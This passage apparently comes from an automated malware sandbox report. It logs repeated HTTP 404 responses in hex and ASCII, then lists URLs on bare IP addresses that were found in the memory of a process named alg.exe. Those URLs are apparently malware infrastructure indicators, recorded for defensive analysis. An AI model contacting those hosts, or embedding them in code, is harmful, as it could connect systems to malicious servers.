4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:30 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:59:34 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:59:34 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: alg.exe, 0000001D.00000003.2169448202.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/vwka
                      Source: alg.exe, 0000001D.00000003.2774103854.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2764898749.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/kafps
                      Source: alg.exe, 0000001D.00000003.2764898749.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2743764090.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/ijq
